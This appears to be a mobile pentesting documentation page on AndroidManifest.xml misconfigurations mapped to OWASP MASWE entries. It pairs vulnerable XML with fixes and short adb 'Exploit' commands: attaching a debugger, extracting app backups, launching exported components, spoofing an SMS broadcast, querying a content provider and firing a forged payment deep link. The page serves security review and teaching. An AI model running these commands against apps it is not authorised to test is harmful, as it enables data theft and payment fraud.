> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# AndroidManifest.xml

> Security vulnerabilities introduced through AndroidManifest.xml misconfigurations: mapped to OWASP MASWE weaknesses.

## Overview

`AndroidManifest.xml` is the application's central configuration file. Misconfigurations here introduce vulnerabilities at the OS level, before a single line of application code runs. Most findings are static and detectable via `apktool` or manual review.

***

## Extract Manifest from APK

```bash theme={"dark"}
apktool d target.apk -o output/
cat output/AndroidManifest.xml
```

Or with `aapt`:

```bash theme={"dark"}
aapt dump xmltree target.apk AndroidManifest.xml
```

***

## Debuggable Flag Enabled

**MASWE-0067 · MASVS-RESILIENCE**: [owasp.org/MASWE-0067](https://mas.owasp.org/MASWE/MASWE-0067/)

`android:debuggable="true"` allows any process to attach a debugger to the app via ADB, even on non-rooted devices.

**Vulnerable:**

```xml theme={"dark"}
<application android:debuggable="true" ...>
```

**Impact:** attacker can attach `jdb`, dump memory, bypass logic, extract secrets at runtime.

**Check:**

```bash theme={"dark"}
adb shell run-as <package.name>
adb jdwp   # lists debuggable processes
```

**Exploit:**

```bash theme={"dark"}
adb forward tcp:8700 jdwp:<PID>
jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8700
```

***

## Backup Enabled

**MASWE-0004 · MASVS-STORAGE**: [owasp.org/MASWE-0004](https://mas.owasp.org/MASWE/MASWE-0004/)

`android:allowBackup="true"` (default) allows full app data extraction without root via `adb backup`.

**Vulnerable:**

```xml theme={"dark"}
<application android:allowBackup="true" ...>
```

**Extract backup:**

```bash theme={"dark"}
adb backup -noapk <package.name>
dd if=backup.ab bs=1 skip=24 | python3 -c "import zlib,sys; sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))" > backup.tar
tar xf backup.tar
```

**Fix:** `android:allowBackup="false"` or use `android:fullBackupContent` rules to exclude sensitive files.

***

## Exported Components

**MASWE-0062 / 0063 / 0064 · MASVS-PLATFORM**: [0062](https://mas.owasp.org/MASWE/MASWE-0062/) · [0063](https://mas.owasp.org/MASWE/MASWE-0063/) · [0064](https://mas.owasp.org/MASWE/MASWE-0064/)

Activities, Services, Receivers, and Providers are exported to other apps when:

* `android:exported="true"` is set explicitly, or
* an `<intent-filter>` is declared (implicit export on API \< 31)

### Exported Activity

```xml theme={"dark"}
<activity android:name=".AdminActivity" android:exported="true" />
```

**Exploit: launch directly:**

```bash theme={"dark"}
adb shell am start -n <package>/.AdminActivity
```

### Exported Service

```xml theme={"dark"}
<service android:name=".SyncService" android:exported="true" />
```

**Exploit:**

```bash theme={"dark"}
adb shell am startservice -n <package>/.SyncService
```

### Exported Broadcast Receiver

```xml theme={"dark"}
<receiver android:name=".SMSReceiver">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
    </intent-filter>
</receiver>
```

**Exploit:**

```bash theme={"dark"}
adb shell am broadcast -a android.provider.Telephony.SMS_RECEIVED -n <package>/.SMSReceiver
```

### Exported Content Provider

```xml theme={"dark"}
<provider
    android:name=".UserProvider"
    android:authorities="com.example.provider"
    android:exported="true" />
```

**Exploit: query data:**

```bash theme={"dark"}
adb shell content query --uri content://com.example.provider/users
```

***

## Cleartext Traffic Allowed

**MASWE-0050 · MASVS-NETWORK**: [owasp.org/MASWE-0050](https://mas.owasp.org/MASWE/MASWE-0050/)

`android:usesCleartextTraffic="true"` permits HTTP connections. All traffic can be intercepted on the same network.

**Vulnerable:**

```xml theme={"dark"}
<application android:usesCleartextTraffic="true" ...>
```

Also check `res/xml/network_security_config.xml` for domain-specific cleartext allowances:

```xml theme={"dark"}
<domain-config cleartextTrafficPermitted="true">
    <domain includeSubdomains="true">api.example.com</domain>
</domain-config>
```

**Intercept with Burp/mitmproxy** after setting the proxy. No certificate bypass needed for plain HTTP.

***

## User CA Trusted in Network Security Config

**MASWE-0286 · MASVS-NETWORK**: [owasp.org/MASWE-0286](https://mas.owasp.org/MASWE/MASWE-0286/)

Allowing user-installed CAs in the Network Security Config makes SSL interception trivial, no root required.

```xml theme={"dark"}
<!-- res/xml/network_security_config.xml -->
<trust-anchors>
    <certificates src="user" />
</trust-anchors>
```

The manifest links it:

```xml theme={"dark"}
<application android:networkSecurityConfig="@xml/network_security_config" ...>
```

**Impact:** attacker installs their CA → intercepts all TLS traffic.

***

## Insecure Deep Links

**MASWE-0058 · MASVS-PLATFORM**: [owasp.org/MASWE-0058](https://mas.owasp.org/MASWE/MASWE-0058/)

Deep links declared without proper validation allow other apps or browsers to trigger internal activities with attacker-controlled data.

**Vulnerable: no verification:**

```xml theme={"dark"}
<activity android:name=".PaymentActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:scheme="myapp" android:host="pay" />
    </intent-filter>
</activity>
```

**Exploit:**

```bash theme={"dark"}
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://pay?amount=0&to=attacker"
```

**Secure alternative:** use App Links (`android:autoVerify="true"` + HTTPS scheme) so the OS verifies domain ownership before accepting the link.

***

## Task Affinity / StrandHogg

**MASWE-0057 · MASVS-PLATFORM**: [owasp.org/MASWE-0057](https://mas.owasp.org/MASWE/MASWE-0057/)

Default `taskAffinity` combined with `launchMode="singleTask"` and `allowTaskReparenting="true"` enables the StrandHogg attack, a malicious app hijacks the foreground of the target app when the user launches it.

**Vulnerable:**

```xml theme={"dark"}
<activity
    android:name=".MainActivity"
    android:allowTaskReparenting="true"
    android:taskAffinity="com.malicious.app" />
```

**Fix:** set `android:taskAffinity=""` to disable reparenting, or `android:launchMode="singleInstance"`.

***

## Insufficient Permission Declarations

**MASWE-0117 · MASVS-PRIVACY**: [owasp.org/MASWE-0117](https://mas.owasp.org/MASWE/MASWE-0117/)

Over-requested permissions increase the attack surface and privacy exposure.

**Check all declared permissions:**

```bash theme={"dark"}
aapt dump permissions target.apk
```

Look for sensitive permissions that may not be required:

```xml theme={"dark"}
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
```

Also check for custom permissions with weak protection level:

```xml theme={"dark"}
<!-- Vulnerable — any app can use this permission -->
<permission
    android:name="com.example.ADMIN"
    android:protectionLevel="normal" />
```

**Fix:** use `android:protectionLevel="signature"` for internal permissions shared between apps of the same developer.

***

## Target and Min SDK Version

**MASWE-0077 / 0078 · MASVS-CODE**: [0077](https://mas.owasp.org/MASWE/MASWE-0077/) · [0078](https://mas.owasp.org/MASWE/MASWE-0078/)

Low `minSdkVersion` exposes the app on older Android versions that lack modern security features. Low `targetSdkVersion` disables OS-level mitigations.

```xml theme={"dark"}
<uses-sdk
    android:minSdkVersion="16"
    android:targetSdkVersion="28" />
```

| Issue                   | Risk                                                  |
| ----------------------- | ----------------------------------------------------- |
| `minSdkVersion < 21`    | Runs on Android 4.x: no enforced SELinux, weak TLS    |
| `targetSdkVersion < 28` | No cleartext block by default, no scoped storage      |
| `targetSdkVersion < 31` | Components with `<intent-filter>` implicitly exported |

***

## References

| ID         | Title                                                              | MASVS Category   | Link                                                     |
| ---------- | ------------------------------------------------------------------ | ---------------- | -------------------------------------------------------- |
| MASWE-0004 | Sensitive Data Not Excluded From Backup                            | MASVS-STORAGE    | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0004/) |
| MASWE-0050 | Cleartext Traffic                                                  | MASVS-NETWORK    | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0050/) |
| MASWE-0057 | StrandHogg Attack / Task Affinity Vulnerability                    | MASVS-PLATFORM   | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0057/) |
| MASWE-0058 | Insecure Deep Links                                                | MASVS-PLATFORM   | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0058/) |
| MASWE-0062 | Insecure Services                                                  | MASVS-PLATFORM   | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0062/) |
| MASWE-0063 | Insecure Broadcast Receivers                                       | MASVS-PLATFORM   | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0063/) |
| MASWE-0064 | Insecure Content Providers                                         | MASVS-PLATFORM   | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0064/) |
| MASWE-0067 | Debuggable Flag Not Disabled                                       | MASVS-RESILIENCE | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0067/) |
| MASWE-0077 | Running on a Recent Platform Version Not Ensured                   | MASVS-CODE       | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0077/) |
| MASWE-0078 | Latest Platform Version Not Targeted                               | MASVS-CODE       | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0078/) |
| MASWE-0117 | Inadequate Permission Management                                   | MASVS-PRIVACY    | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0117/) |
| MASWE-0286 | Network Security Configuration Allowing Trust in User-Provided CAs | MASVS-NETWORK    | [mas.owasp.org](https://mas.owasp.org/MASWE/MASWE-0286/) |

***

## Quick Checklist

| Flag                            | Safe Value                | Risk if Wrong                |
| ------------------------------- | ------------------------- | ---------------------------- |
| `android:debuggable`            | `false`                   | Debugger attach, memory dump |
| `android:allowBackup`           | `false`                   | Full data extraction via ADB |
| `android:exported`              | `false` (unless required) | Component hijack             |
| `android:usesCleartextTraffic`  | `false`                   | HTTP interception            |
| `android:networkSecurityConfig` | No user CAs               | SSL interception             |
| `android:autoVerify`            | `true` on App Links       | Deep link hijack             |
| `android:taskAffinity`          | `""`                      | StrandHogg                   |
| `android:protectionLevel`       | `signature` for internal  | Permission abuse             |
